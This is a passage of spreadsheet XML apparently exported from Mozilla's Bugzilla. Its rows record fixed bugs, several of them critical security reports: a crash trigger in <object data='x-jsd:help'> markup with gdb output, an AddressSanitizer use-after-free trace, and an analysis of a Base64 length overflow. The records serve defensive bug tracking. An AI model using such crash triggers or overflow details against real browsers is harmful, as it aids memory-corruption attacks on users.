        <v>1</v>
      </c>
      <c r="F5672" t="n">
        <v>1</v>
      </c>
      <c r="G5672" t="n">
        <v>6</v>
      </c>
      <c r="H5672" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5672" t="inlineStr">
        <is>
          <t>Other Applications Graveyard</t>
        </is>
      </c>
      <c r="J5672" t="inlineStr">
        <is>
          <t>Venkman JS Debugger</t>
        </is>
      </c>
      <c r="K5672" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5672" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5672" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5672" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5672" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5672" t="inlineStr">
        <is>
          <t>[sg:investigate] requires js debugger installed.</t>
        </is>
      </c>
      <c r="Q5672" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5672" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5672" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5672" t="n">
        <v>1</v>
      </c>
      <c r="U5672" t="n">
        <v>0</v>
      </c>
      <c r="V5672" t="n">
        <v>44</v>
      </c>
      <c r="W5672" t="inlineStr">
        <is>
          <t>there is a memory corruption in mozilla &lt;object data='x-jsd:help'&gt;
Mozilla 1.7.12
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20060202
triggered by &lt;object data='x-jsd:help'&gt;
Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1218234688 (LWP 26508)]
0xb75c0de3 in XPTC_InvokeByIndex () from /opt/mozilla-nightly/libxpcom.so
(gdb) x/i $eip
0xb75c0de3 &lt;XPTC_InvokeByIndex+39&gt;:     call   *(%edx)
(gdb) p/x $edx
$1 = 0x10
(gdb) 
crash place/$eip seems to depend on previous actions.
win32 on wine also crashes.
testcase to follow.</t>
        </is>
      </c>
      <c r="X5672" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5673">
      <c r="A5673" t="n">
        <v>773207</v>
      </c>
      <c r="B5673" t="inlineStr">
        <is>
          <t>2012-07-12 03:11:55 -0700</t>
        </is>
      </c>
      <c r="C5673" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsObjectLoadingContent::LoadObject</t>
        </is>
      </c>
      <c r="D5673" t="inlineStr">
        <is>
          <t>2024-05-29 16:02:26 -0700</t>
        </is>
      </c>
      <c r="E5673" t="n">
        <v>1</v>
      </c>
      <c r="F5673" t="n">
        <v>1</v>
      </c>
      <c r="G5673" t="n">
        <v>3</v>
      </c>
      <c r="H5673" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5673" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5673" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5673" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5673" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5673" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5673" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5673" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5673" t="inlineStr">
        <is>
          <t>[asan][advisory-tracking+][qa?]</t>
        </is>
      </c>
      <c r="Q5673" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5673" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5673" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5673" t="n">
        <v>1</v>
      </c>
      <c r="U5673" t="n">
        <v>0</v>
      </c>
      <c r="V5673" t="n">
        <v>31</v>
      </c>
      <c r="W5673" t="inlineStr">
        <is>
          <t>Reproduces on trunk, testcase coming.
=================================================================
==16419== ERROR: AddressSanitizer heap-use-after-free on address 0x7f51151628d0 at pc 0x7f5137378a53 bp 0x7fff7866bed0 sp 0x7fff7866bec8
READ of size 8 at 0x7f51151628d0 thread T0
    #0 0x7f5137378a53 in nsObjectLoadingContent::LoadObject(nsIURI*, bool, nsCString const&amp;, bool) firefox/src/content/base/src/nsObjectLoadingContent.cpp:1316
    #1 0x7f5137373ece in nsObjectLoadingContent::LoadObject(nsAString_internal const&amp;, bool, nsCString const&amp;, bool) firefox/src/content/base/src/nsObjectLoadingContent.cpp:1250
    #2 0x7f51385729db in nsHTMLSharedObjectElement::StartObjectLoad(bool) firefox/src/content/html/content/src/nsHTMLSharedObjectElement.cpp:482
    #3 0x7f51385772e8 in nsHTMLSharedObjectElement::StartObjectLoad() firefox/src/content/html/content/src/nsHTMLSharedObjectElement.cpp:112
    #4 0x7f5138594c59 in nsRunnableMethodImpl&lt;void (nsHTMLSharedObjectElement::*)(), true&gt;::Run() firefox/src/../../../../dist/include/nsThreadUtils.h:349
    #5 0x7f5136e13965 in nsContentUtils::RemoveScriptBlocker() firefox/src/content/base/src/nsContentUtils.cpp:4888
    #6 0x7f5135c516bd in ~mozAutoDocUpdate firefox/src/../../../../dist/include/mozAutoDocUpdate.h:40
    #7 0x7f5135c1c743 in ~mozAutoDocUpdate firefox/src/../../../../dist/include/mozAutoDocUpdate.h:40
    #8 0x7f51372b2fe8 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*) firefox/src/content/base/src/nsINode.cpp:1891
    #9 0x7f51374978f7 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, unsigned int*) firefox/src/../../../../dist/include/nsINode.h:1462
    #10 0x7f51374959d9 in nsINode::InsertBefore(nsINode*, nsINode*, unsigned int*) firefox/src/../../../../dist/include/nsINode.h:494
    #11 0x7f5138073ccb in nsINode::AppendChild(nsINode*, unsigned int*) firefox/src/../../../../dist/include/nsINode.h:504
    #12 0x7f513c101907 in nsIDOMNode_AppendChild(JSContext*, unsigned int, JS::Value*) firefox/src/objdir-ff-asan-sym/js/xpconnect/src/dom_quickstubs.cpp:5400
    #13 0x7f51471ac507 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) firefox/src/js/src/jscntxtinlines.h:385
    #14 0x7f5147123006 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) firefox/src/js/src/jsinterp.cpp:2442
    #15 0x7f51470aa276 in js::RunScript(JSContext*, JSScript*, js::StackFrame*) firefox/src/js/src/jsinterp.cpp:301
    #16 0x7f51471b937d in js::ExecuteKernel(JSContext*, JSScript*, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::StackFrame*, JS::Value*) firefox/src/js/src/jsinterp.cpp:487
    #17 0x7f51471bb080 in js::Execute(JSContext*, JSScript*, JSObject&amp;, JS::Value*) firefox/src/js/src/jsinterp.cpp:524
    #18 0x7f51469b1081 in EvaluateUCScriptForPrincipalsCommon(JSContext*, JSObject*, JSPrincipals*, JSPrincipals*, unsigned short const*, unsigned int, char const*, unsigned int, JS::Value*, JSVersion) firefox/src/js/src/jsapi.cpp:5373
    #19 0x7f51469b2fbc in JS_EvaluateUCScriptForPrincipalsVersionOrigin firefox/src/js/src/jsapi.cpp:5410
    #20 0x7f513914479f in nsJSContext::EvaluateString(nsAString_internal const&amp;, JSObject*, nsIPrincipal*, nsIPrincipal*, char const*, unsigned int, JSVersion, nsAString_internal*, bool*) firefox/src/dom/base/nsJSEnvironment.cpp:1466
    #21 0x7f51392f3c9e in nsGlobalWindow::RunTimeoutHandler(nsTimeout*, nsIScriptContext*) firefox/src/dom/base/nsGlobalWindow.cpp:9527
    #22 0x7f51392a9d32 in nsGlobalWindow::RunTimeout(nsTimeout*) firefox/src/dom/base/nsGlobalWindow.cpp:9791
    #23 0x7f51392f1eab in nsGlobalWindow::TimerCallback(nsITimer*, void*) firefox/src/dom/base/nsGlobalWindow.cpp:10063
    #24 0x7f5140707272 in nsTimerImpl::Fire() firefox/src/xpcom/threads/nsTimerImpl.cpp:474
    #25 0x7f5140708eac in nsTimerEvent::Run() firefox/src/xpcom/threads/nsTimerImpl.cpp:558
    #26 0x7f51406cb4fd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #27 0x7f514035a30d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #28 0x7f513f3fb366 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #29 0x7f514097f46a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #30 0x7f514097f2b3 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #31 0x7f514097f198 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #32 0x7f513e9321ee in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #33 0x7f513d585a28 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #34 0x7f5133d63830 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #35 0x7f5133d6a1d2 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #36 0x7f5133d6d6a2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #37 0x40c29f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #38 0x409ccd in main firefox/src/browser/app/nsBrowserApp.cpp:298
    #39 0x7f51504e8c4d in ?? ??:0
0x7f51151628d0 is located 80 bytes inside of 1112-byte region [0x7f5115162880,0x7f5115162cd8)
freed by thread T0 here:
    #0 0x4a43a2 in free ??:0
    #1 0x7f514d3745d3 in moz_free firefox/src/memory/mozalloc/mozalloc.cpp:49
    #2 0x7f513470e4f6 in ~nsHttpChannel firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:332
    #3 0x7f5140440702 in nsHashPropertyBag::Release() firefox/src/xpcom/ds/nsHashPropertyBag.cpp:40
    #4 0x7f51346da3d4 in mozilla::net::HttpBaseChannel::Release() firefox/src/netwerk/protocol/http/HttpBaseChannel.cpp:143
    #5 0x7f51347788b4 in mozilla::net::nsHttpChannel::Release() firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:4242
    #6 0x7f51347789ec in non-virtual thunk to mozilla::net::nsHttpChannel::Release() firefox/src/modules/zlib/src/inffast.c:0
    #7 0x7f5133e87001 in nsCOMPtr_base::assign_assuming_AddRef(nsISupports*) firefox/src/../../dist/include/nsCOMPtr.h:440
    #8 0x7f5140310e44 in nsCOMPtr_base::assign_with_AddRef(nsISupports*) firefox/src/objdir-ff-asan-sym/xpcom/build/nsCOMPtr.cpp:50
    #9 0x7f5133e7d563 in nsCOMPtr&lt;nsIChannel&gt;::operator=(nsIChannel*) firefox/src/../../../../dist/include/nsCOMPtr.h:624
    #10 0x7f513470a0f6 in mozilla::net::AutoRedirectVetoNotifier::ReportRedirectResult(bool) firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:178
    #11 0x7f51347c5068 in ~AutoRedirectVetoNotifier firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:162
    #12 0x7f513474a9c3 in ~AutoRedirectVetoNotifier firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:162
    #13 0x7f51347774ff in mozilla::net::nsHttpChannel::ContinueProcessRedirection(unsigned int) firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:4195
    #14 0x7f51347a8e76 in mozilla::net::nsHttpChannel::OnRedirectVerifyCallback(unsigned int) firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:5782
    #15 0x7f51347a9ad2 in non-virtual thunk to mozilla::net::nsHttpChannel::OnRedirectVerifyCallback(unsigned int) firefox/src/modules/zlib/src/inffast.c:0
    #16 0x7f5133e87ca4 in nsAsyncVerifyRedirectCallbackEvent::Run() firefox/src/netwerk/base/src/nsAsyncRedirectVerifyHelper.cpp:44
    #17 0x7f51406cb4fd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #18 0x7f514035a30d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #19 0x7f513f3fb366 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #20 0x7f514097f46a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #21 0x7f514097f2b3 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #22 0x7f514097f198 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #23 0x7f513e9321ee in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #24 0x7f513d585a28 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #25 0x7f5133d63830 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #26 0x7f5133d6a1d2 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
    #27 0x7f5133d6d6a2 in XRE_main firefox/src/toolkit/xre/nsAppRunner.cpp:3940
    #28 0x40c29f in do_main(int, char**) firefox/src/browser/app/nsBrowserApp.cpp:160
    #29 0x409ccd in main firefox/src/browser/app/nsBrowserApp.cpp:298
previously allocated by thread T0 here:
    #0 0x4a4462 in __interceptor_malloc ??:0
    #1 0x7f514d374727 in moz_xmalloc firefox/src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f51346c8bd9 in nsHttpHandler::NewProxiedChannel(nsIURI*, nsIProxyInfo*, nsIChannel**) firefox/src/netwerk/protocol/http/nsHttpHandler.cpp:1437
    #3 0x7f51346c7acb in nsHttpHandler::NewChannel(nsIURI*, nsIChannel**) firefox/src/netwerk/protocol/http/nsHttpHandler.cpp:1398
    #4 0x7f5133f6c1eb in nsIOService::NewChannelFromURIWithProxyFlags(nsIURI*, nsIURI*, unsigned int, nsIChannel**) firefox/src/netwerk/base/src/nsIOService.cpp:657
    #5 0x7f5133f6ada0 in nsIOService::NewChannelFromURI(nsIURI*, nsIChannel**) firefox/src/netwerk/base/src/nsIOService.cpp:576
    #6 0x7f51347757e2 in mozilla::net::nsHttpChannel::ContinueProcessRedirectionAfterFallback(unsigned int) firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:4120
    #7 0x7f5134723559 in mozilla::net::nsHttpChannel::AsyncProcessRedirection(unsigned int) firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:4052
    #8 0x7f5134734a7c in mozilla::net::nsHttpChannel::ProcessResponse() firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:1264
    #9 0x7f513478d8bc in mozilla::net::nsHttpChannel::OnStartRequest(nsIRequest*, nsISupports*) firefox/src/netwerk/protocol/http/nsHttpChannel.cpp:4802
    #10 0x7f513478ee97 in non-virtual thunk to mozilla::net::nsHttpChannel::OnStartRequest(nsIRequest*, nsISupports*) firefox/src/modules/zlib/src/inffast.c:0
    #11 0x7f5133f3f162 in nsInputStreamPump::OnStateStart() firefox/src/netwerk/base/src/nsInputStreamPump.cpp:416
    #12 0x7f5133f3e30d in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) firefox/src/netwerk/base/src/nsInputStreamPump.cpp:367
    #13 0x7f5133f41c2f in non-virtual thunk to nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) firefox/src/modules/zlib/src/inffast.c:0
    #14 0x7f51405b72ee in nsInputStreamReadyEvent::Run() firefox/src/xpcom/io/nsStreamUtils.cpp:82
    #15 0x7f51406cb4fd in nsThread::ProcessNextEvent(bool, bool*) firefox/src/xpcom/threads/nsThread.cpp:625
    #16 0x7f514035a30d in NS_ProcessNextEvent_P(nsIThread*, bool) firefox/src/objdir-ff-asan-sym/xpcom/build/nsThreadUtils.cpp:217
    #17 0x7f513f3fb366 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) firefox/src/ipc/glue/MessagePump.cpp:82
    #18 0x7f514097f46a in MessageLoop::RunInternal() firefox/src/ipc/chromium/src/base/message_loop.cc:209
    #19 0x7f514097f2b3 in MessageLoop::RunHandler() firefox/src/ipc/chromium/src/base/message_loop.cc:202
    #20 0x7f514097f198 in MessageLoop::Run() firefox/src/ipc/chromium/src/base/message_loop.cc:176
    #21 0x7f513e9321ee in nsBaseAppShell::Run() firefox/src/widget/xpwidgets/nsBaseAppShell.cpp:165
    #22 0x7f513d585a28 in nsAppStartup::Run() firefox/src/toolkit/components/startup/nsAppStartup.cpp:257
    #23 0x7f5133d63830 in XREMain::XRE_mainRun() firefox/src/toolkit/xre/nsAppRunner.cpp:3787
    #24 0x7f5133d6a1d2 in XREMain::XRE_main(int, char**, nsXREAppData const*) firefox/src/toolkit/xre/nsAppRunner.cpp:3864
==16419== ABORTING
Stats: 340M malloced (374M for red zones) by 855014 calls
Stats: 92M realloced by 60631 calls
Stats: 302M freed by 692995 calls
Stats: 180M really freed by 372279 calls
Stats: 480M (122951 full pages) mmaped in 120 calls
  mmaps   by size class: 8:425958; 9:57337; 10:24570; 11:20470; 12:6144; 13:4608; 14:1792; 15:384; 16:640; 17:160; 18:336; 19:48; 20:16;
  mallocs by size class: 8:671876; 9:92732; 10:38267; 11:31549; 12:8574; 13:6870; 14:2771; 15:720; 16:804; 17:284; 18:490; 19:62; 20:15;
  frees   by size class: 8:533367; 9:79542; 10:33885; 11:27984; 12:7349; 13:6211; 14:2532; 15:641; 16:706; 17:264; 18:443; 19:59; 20:12;
  rfrees  by size class: 8:274158; 9:50191; 10:20177; 11:18120; 12:3448; 13:3069; 14:1711; 15:414; 16:562; 17:161; 18:216; 19:42; 20:10;
Stats: malloc large: 851 small slow: 4152
Shadow byte and word:
  0x1fea22a2c51a: fd
  0x1fea22a2c518: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fea22a2c4f8: fa fa fa fa fa fa fa fa
  0x1fea22a2c500: fa fa fa fa fa fa fa fa
  0x1fea22a2c508: fa fa fa fa fa fa fa fa
  0x1fea22a2c510: fd fd fd fd fd fd fd fd
=&gt;0x1fea22a2c518: fd fd fd fd fd fd fd fd
  0x1fea22a2c520: fd fd fd fd fd fd fd fd
  0x1fea22a2c528: fd fd fd fd fd fd fd fd
  0x1fea22a2c530: fd fd fd fd fd fd fd fd
  0x1fea22a2c538: fd fd fd fd fd fd fd fd</t>
        </is>
      </c>
      <c r="X5673" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5674">
      <c r="A5674" t="n">
        <v>692817</v>
      </c>
      <c r="B5674" t="inlineStr">
        <is>
          <t>2011-10-07 09:32:16 -0700</t>
        </is>
      </c>
      <c r="C5674" t="inlineStr">
        <is>
          <t>nsA(C)String::SetLength overflow in EncodeInputStream</t>
        </is>
      </c>
      <c r="D5674" t="inlineStr">
        <is>
          <t>2015-10-16 11:38:34 -0700</t>
        </is>
      </c>
      <c r="E5674" t="n">
        <v>1</v>
      </c>
      <c r="F5674" t="n">
        <v>1</v>
      </c>
      <c r="G5674" t="n">
        <v>3</v>
      </c>
      <c r="H5674" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5674" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5674" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5674" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5674" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5674" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5674" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5674" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5674" t="inlineStr">
        <is>
          <t>[sg:critical][qa-]</t>
        </is>
      </c>
      <c r="Q5674" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5674" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5674" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5674" t="n">
        <v>1</v>
      </c>
      <c r="U5674" t="n">
        <v>0</v>
      </c>
      <c r="V5674" t="n">
        <v>20</v>
      </c>
      <c r="W5674" t="inlineStr">
        <is>
          <t>http://hg.mozilla.org/mozilla-central/annotate/bd1411e362fb/xpcom/io/Base64.cpp#l198
Result of |(aCount + 2) / 3 * 4 + aOffset| may overflow based on the argument aCount and aOffset.  The resulting buffer size result could be truncated and we'll write (potentially attacker controlled content) past the buffer.
Reporting as unconfirmed since I'm not sure there is somewhere an overflow check, but doesn't seems to be, and also not sure this is easily exploitable.
I can try to create a test case.</t>
        </is>
      </c>
      <c r="X5674" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5675">
      <c r="A5675" t="n">
        <v>613084</v>
      </c>
      <c r="B5675" t="inlineStr">
        <is>
          <t>2010-11-17 16:33:39 -0800</t>
        </is>
      </c>
      <c r="C5675" t="inlineStr">
        <is>
          <t>Allow users to stay signed in longer (twitter oauth cookie)</t>
        </is>
      </c>
      <c r="D5675" t="inlineStr">
        <is>
          <t>2012-06-06 13:17:51 -0700</t>
        </is>
      </c>
      <c r="E5675" t="n">
        <v>1</v>
      </c>
      <c r="F5675" t="n">
        <v>1</v>
      </c>
      <c r="G5675" t="n">
        <v>5</v>
      </c>
      <c r="H5675" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5675" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5675" t="inlineStr">
        <is>
          <t>Army of Awesome</t>
        </is>
      </c>
      <c r="K5675" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5675" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5675" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5675" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5675" t="inlineStr">
        <is>
          <t>u=contributor c=AoA p=1</t>
        </is>
      </c>
      <c r="Q5675" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5675" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5675" t="inlineStr">
        <is>
          <t>2012.11</t>
        </is>
      </c>
      <c r="T5675" t="n">
        <v>1</v>
      </c>
      <c r="U5675" t="n">
        <v>0</v>
      </c>
      <c r="V5675" t="n">
        <v>9</v>
      </c>
      <c r="W5675" t="inlineStr">
        <is>
          <t>After a short period of inactivity, users are automatically signed out and need to sign in again. We should look into how we can extend the session duration. Not sure if this is a Twitter OAuth issue or a setting in Django.</t>
        </is>
      </c>
      <c r="X5675" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5676">
      <c r="A5676" t="n">
        <v>1613728</v>
      </c>
      <c r="B5676" t="inlineStr">
        <is>
          <t>2020-02-06 10:23:48 -0800</t>
        </is>
      </c>
      <c r="C5676" t="inlineStr">
        <is>
          <t>Please add kwerts@mozilla.com to the security blog</t>
        </is>
      </c>
      <c r="D5676" t="inlineStr">
        <is>
          <t>2020-02-06 11:32:08 -0800</t>
        </is>
      </c>
      <c r="E5676" t="n">
        <v>1</v>
      </c>
      <c r="F5676" t="n">
        <v>1</v>
      </c>
      <c r="G5676" t="n">
        <v>5</v>
      </c>
      <c r="H5676" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5676" t="inlineStr">
        <is>
          <t>Infrastructure &amp; Operations</t>
        </is>
      </c>
      <c r="J5676" t="inlineStr">
        <is>
          <t>Blogs</t>
        </is>
      </c>
      <c r="K5676" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5676" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5676" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5676" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5676" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5676" t="inlineStr"/>
      <c r="Q5676" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5676" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5676" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5676" t="n">
        <v>1</v>
      </c>
      <c r="U5676" t="n">
        <v>0</v>
      </c>
      <c r="V5676" t="n">
        <v>3</v>
      </c>
      <c r="W5676" t="inlineStr">
        <is>
          <t>Please add kwerts@mozilla.com as a blog post author to the blog.mozilla.org/security blog. She will be writing an announcement post for Multi-Account Containers.</t>
        </is>
      </c>
      <c r="X5676" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5677">
      <c r="A5677" t="n">
        <v>508031</v>
      </c>
      <c r="B5677" t="inlineStr">
        <is>
          <t>2009-08-03 07:59:30 -0700</t>
        </is>
      </c>
      <c r="C5677" t="inlineStr">
        <is>
          <t>Request to move Solaris contrib. builds for Firefox 3.5.2 to bouncer</t>
        </is>
      </c>
      <c r="D5677" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5677" t="n">
        <v>1</v>
      </c>
      <c r="F5677" t="n">
        <v>1</v>
      </c>
      <c r="G5677" t="n">
        <v>5</v>
      </c>
      <c r="H5677" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5677" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5677" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5677" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5677" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5677" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N5677" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5677" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5677" t="inlineStr"/>
      <c r="Q5677" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5677" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5677" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5677" t="n">
        <v>1</v>
      </c>
      <c r="U5677" t="n">
        <v>0</v>
      </c>
      <c r="V5677" t="n">
        <v>2</v>
      </c>
      <c r="W5677" t="inlineStr">
        <is>
          <t>This is the request to move Solaris contrib. builds for Firefox 3.5.2 to
bouncer.
solaris-sparc:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.5.2/contrib/solaris_tarball/firefox-3.5.2.en-US.solaris-10-fcs-sparc.tar.bz2
solaris-i386:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.5.2/contrib/solaris_tarball/firefox-3.5.2.en-US.solaris-10-fcs-i386.tar.bz2
opensolaris-sparc:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.5.2/contrib/solaris_tarball/firefox-3.5.2.en-US.opensolaris-sparc.tar.bz2
opensolaris-i386:
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.5.2/contrib/solaris_tarball/firefox-3.5.2.en-US.opensolaris-i386.tar.bz2
BTW, the partial MAR for opensolairis-i386 (3.5.1 to 3.5.2) is also available. Could this be moved to bouncer as well?
http://releases.mozilla.org/pub/mozilla.org/firefox/releases/3.5.2/contrib/solaris_tarball/firefox-3.5.1-3.5.2.en-US.opensolaris-i386.partial.mar
Thanks.</t>
        </is>
      </c>
      <c r="X5677" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5678">
      <c r="A5678" t="n">
        <v>646825</v>
      </c>
      <c r="B5678" t="inlineStr">
        <is>
          <t>2011-03-31 07:10:01 -0700</t>
        </is>
      </c>
      <c r="C5678" t="inlineStr">
        <is>
          <t>[ANGLE] crash [@ gl::VertexDataConverter&lt;float, gl::WidenRule&lt;int, 2&gt;, gl::ConversionRule&lt;int, 0, int&gt;, gl::DefaultVertexValues&lt;float, int&gt; &gt;::convertArray(float const*, unsigned int, unsigned int, float*)]with Google Labs' Body Map</t>
        </is>
      </c>
      <c r="D5678" t="inlineStr">
        <is>
          <t>2015-10-16 11:47:10 -0700</t>
        </is>
      </c>
      <c r="E5678" t="n">
        <v>1</v>
      </c>
      <c r="F5678" t="n">
        <v>1</v>
      </c>
      <c r="G5678" t="n">
        <v>3</v>
      </c>
      <c r="H5678" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5678" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5678" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K5678" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
